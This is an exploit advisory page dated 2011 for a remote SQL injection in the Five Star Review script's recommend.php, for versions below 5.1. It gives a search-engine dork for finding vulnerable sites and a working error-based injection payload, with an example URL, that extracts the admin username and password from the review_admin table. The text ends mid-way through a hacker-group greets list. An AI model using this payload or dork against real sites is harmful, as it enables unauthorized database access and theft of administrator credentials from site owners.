Five Star Review Remote SQL Injection (recommend.php)



EKU-ID: 1389 CVE: OSVDB-ID:
Author: EthicalPractice Published: 2011-12-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


################################################################################################
#  Exploit Title: Five Star Review Remote SQL Injection (recommend.php)
#  Script Page : http://www.review-script.com
#  Date: 5-12-2011
#  Version: Versions below v5.1
#  Author : EthicalPractice
#  Tested on: Firefox 8.0, Palemoon 8.0, Internet Explorer 9
#  Note: This exploit works on the older versions ONLY.
################################################################################################

## Injection Point : /recommend.php?item_id=[SQL]
## Dork: intext:"Powered by Five Star Review" + inurl:recommend.php

## Exploit Code: +and+(select 1
from(select+count(*),concat((select+concat(username,0x3a,passtext) from
review_admin+limit+0,1),floor(rand(0)*2))a from
information_schema.tables+group by a)b)


## Example: /recommend.php?item_id=-1+and+(select 1
from(select+count(*),concat((select+concat(username,0x3a,passtext) from
review_admin+limit+0,1),floor(rand(0)*2))a from
information_schema.tables+group by a)b)


################################################################################################

#  Team Intra till I die.
#  Greets to thethatguy, Haxor, kaledori, Zelos, Mx., exc3llent, skynet,
m00dy, v3xr, Codine, Classy, VipVince, Dan, Prominent, Gringoire, hac